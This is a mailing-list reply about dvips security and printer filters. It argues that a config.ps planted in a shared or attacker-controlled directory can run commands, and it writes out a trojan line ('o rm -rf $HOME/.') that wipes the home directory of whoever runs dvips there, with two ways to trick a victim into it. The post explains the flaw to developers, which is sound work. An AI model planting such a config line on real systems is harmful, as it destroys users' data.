On Jan 17, Reinhard Kotucha wrote:

>     > Furthermore in output pipe we could have different level of
>     > security, so to have both tex users as well as unix sysadmin
>     > happy (the latter mainly because dvips is for instance used in
>     > some printer filter which could run with root privileges):
>
> Are there any systems where printer filters has to run with root
> privileges?  On my sytem it's run as user "lp" which is, of course,
> more secure.

doesn't matter.  think about the following example:

BadGuy:
        cd /tmp
        echo 'o rm -rf $HOME/.' > config.ps

GoodGuy:
        cd /tmp
        echo 'Help! \bye' > baz.tex
        tex baz
        dvips baz

a test for non-writable directory for "trusted" config.ps is not an option either.

example 1: BadGuy has bad config.ps in his $HOME and asks GoodGuy to help him,
texing/dvipsing an example in ~BadGuy/.

example 2: first place config.ps trojan in some directory, then chmod -w .

Harald Koenig
--
"I hope to die                                      ___       _____
before I *have* to use Microsoft Word.",           0--,|    /OOOOOOO\